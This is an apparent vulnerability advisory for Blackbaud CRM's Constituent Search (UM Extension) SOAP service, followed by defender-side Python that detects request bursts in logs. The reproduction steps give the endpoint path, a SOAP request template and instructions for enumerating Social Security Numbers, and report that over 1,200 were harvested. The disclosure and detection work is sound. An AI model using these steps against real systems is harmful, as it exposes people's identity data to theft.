Using Webservices Constituent Search Vulnerability

In creating a web service application, an authenticated, authorized BBEC user with the "General Access" role can query the "Constituent Search (UM Extension)" service to match valid Social Security Numbers to constituents, causing a search vulnerability.
Download and install the latest patch, which contains all fixes from previous patches. If you are running an older version, download and install the latest version and then the patch. 


Here are the steps:

1. Log in as a user with the "General Access" role (I don’t know if this is a role we created, or one that came configured with the CRM).

2. POST a request to the "Constituent Search (UM Extension)" endpoint (/bbappfx/vpp/bizops/db%5BBTP_PROD%5D/searchlists/76d8c79c-b8d4-4349-beb5-283b4bad4285/soap.asmx) with the following contents:

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:blac="blackbaud_appfx_server_bizops">
      <soapenv:Header/>
      <soapenv:Body>
        <blac:SearchRequest>
          <!--Optional:-->
          <blac:SessionKey>[session key as needed]</blac:SessionKey>
          <!--Optional:-->
          <blac:Criteria>
            <!--Optional:-->
            <blac:SSN>[SSN to test]</blac:SSN>
          </blac:Criteria>
        </blac:SearchRequest>
      </soapenv:Body>
    </soapenv:Envelope>

3. If the SSN is valid and the corresponding person exists in the database, a record will be returned that contains identifying information.

4. For the next request, the SSN can be incremented by one, or chosen in some other manner, and the POST would be repeated with the new SSN.

To fully exploit this, an authenticated and authorized attacker would send repeated requests and record any hits on real records. I was able to get a hit rate of about 2% in my tests, which allowed harvesting of more than 1,200 valid SSNs in around ten minutes.
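As an added defender-side example (not from this article or from Blackbaud), the following Python scans constructed web-server log lines for the burst of POSTs to the Constituent Search endpoint that the enumeration described above produces; the simplified log layout, the usernames and the 50-requests-per-minute threshold are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Path of the Constituent Search (UM Extension) SOAP endpoint; the searchlist
# GUID is the one quoted in the article, the db name is matched generically.
SEARCH_ENDPOINT = re.compile(
    r"/bbappfx/vpp/bizops/db%5B[^/]+%5D/searchlists/"
    r"76d8c79c-b8d4-4349-beb5-283b4bad4285/soap\.asmx$", re.IGNORECASE)

# Assumed simplified W3C-style fields: date time cs-username cs-method cs-uri-stem sc-status
LINE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\d{3})$")

def flag_enumeration(lines, window_sec=60, max_requests=50):
    """Return {user: start_of_burst} for each user who POSTed to the search
    endpoint more than max_requests times inside any sliding window_sec window."""
    recent = defaultdict(deque)   # per-user timestamps still inside the window
    flagged = {}
    for raw in lines:
        m = LINE.match(raw.strip())
        if not m:
            continue                # not a line in the assumed layout
        ts_s, user, method, path, _status = m.groups()
        if method != "POST" or not SEARCH_ENDPOINT.search(path):
            continue                # only search-endpoint POSTs are counted
        ts = datetime.strptime(ts_s, "%Y-%m-%d %H:%M:%S")
        q = recent[user]
        q.append(ts)
        while ts - q[0] > timedelta(seconds=window_sec):
            q.popleft()             # drop timestamps older than the window
        if len(q) > max_requests and user not in flagged:
            flagged[user] = q[0]
    return flagged

def build_sample_log():
    """Constructed log: one ordinary lookup by 'jdoe' and 120 POSTs in one
    minute from 'svc_batch' (both usernames and the date are invented)."""
    path = ("/bbappfx/vpp/bizops/db%5BBTP_PROD%5D/searchlists/"
            "76d8c79c-b8d4-4349-beb5-283b4bad4285/soap.asmx")
    t0 = datetime(2024, 1, 1, 10, 0, 0)
    lines = [f"{t0:%Y-%m-%d %H:%M:%S} jdoe POST {path} 200"]
    for i in range(120):
        t = t0 + timedelta(seconds=i // 2)   # two requests per second
        lines.append(f"{t:%Y-%m-%d %H:%M:%S} svc_batch POST {path} 200")
    return lines

if __name__ == "__main__":
    for user, start in flag_enumeration(build_sample_log()).items():
        print(f"possible SSN enumeration by {user} starting {start}")
```

Real IIS logs carry more fields and a different order, so the LINE pattern must be adapted to the site's logging configuration before use.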

Environment

2.91.1535, patch 36
